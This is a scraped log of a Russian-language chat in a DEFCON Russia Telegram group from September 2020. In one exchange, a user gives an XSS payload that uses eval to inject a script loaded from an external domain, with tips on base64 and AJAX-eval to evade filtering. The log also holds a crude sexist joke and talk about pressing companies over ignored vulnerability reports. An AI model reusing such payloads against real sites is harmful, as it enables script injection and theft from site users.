Size: a a a

DCG#7812 DEFCON-RUSSIA

2020 September 02

JG

JeisonWi Garrison in DCG#7812 DEFCON-RUSSIA
источник

ЕШ

Е. Шакал in DCG#7812 DEFCON-RUSSIA
Есть вопрос. Я могу исполнить javascript:alert(1) из урла. Можно ли в таком случае исполнить скрипт через src с внешнего домена
источник

ЕШ

Е. Шакал in DCG#7812 DEFCON-RUSSIA
Разный синтаксис пробовал - не получается
источник

I

Ivan in DCG#7812 DEFCON-RUSSIA
как насчет такого
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://domain.com/1.js\';document.body.appendChild(a)')
источник

I

Ivan in DCG#7812 DEFCON-RUSSIA
или аяксом выкачать скрипт и эвальнуть
источник

ЕШ

Е. Шакал in DCG#7812 DEFCON-RUSSIA
Ivan
как насчет такого
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://domain.com/1.js\';document.body.appendChild(a)')
Кавычка не проходит (
источник

I

Ivan in DCG#7812 DEFCON-RUSSIA
а если в base64 спрятать
источник

ЕШ

Е. Шакал in DCG#7812 DEFCON-RUSSIA
буду пробовать
источник
2020 September 04

a

a user in DCG#7812 DEFCON-RUSSIA
Выше — боты. Они тоже вступили в мой английский чат.
источник

AB

Agnia Baar in DCG#7812 DEFCON-RUSSIA
Я не робот *
источник

AB

Agnia Baar in DCG#7812 DEFCON-RUSSIA
*)
источник

AW

Anna Weine in DCG#7812 DEFCON-RUSSIA
Agnia Baar
Я не робот *
Чем докажете?
источник

a

a user in DCG#7812 DEFCON-RUSSIA
Anna Weine
Чем докажете?
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
источник

AB

Agnia Baar in DCG#7812 DEFCON-RUSSIA
источник

AW

Anna Weine in DCG#7812 DEFCON-RUSSIA
a user
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
Тогда я - участник
источник

AB

Agnia Baar in DCG#7812 DEFCON-RUSSIA
a user
Я бы пошутил про то, что все участницы должны скинуть сиськи, но для этого чата это слишком грубо)
Да вы правы)
источник

JG

JeisonWi Garrison in DCG#7812 DEFCON-RUSSIA
источник
2020 September 05

RT

Rikki Tikki in DCG#7812 DEFCON-RUSSIA
Ребята, что делаете если находите уязвимости в сайтах/продуктах и на вежливые письма с вопросами по поводу кооперации вас игнорят? П.с. компании в последнее время случайно попадались Российские
источник

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
Rikki Tikki
Ребята, что делаете если находите уязвимости в сайтах/продуктах и на вежливые письма с вопросами по поводу кооперации вас игнорят? П.с. компании в последнее время случайно попадались Российские
Я забивал болт
источник

RT

Rikki Tikki in DCG#7812 DEFCON-RUSSIA
Что если деликатно подкатывать к компаниям которые зависят от этого продукта и уязвимы из-за дыры их партнёра ?
источник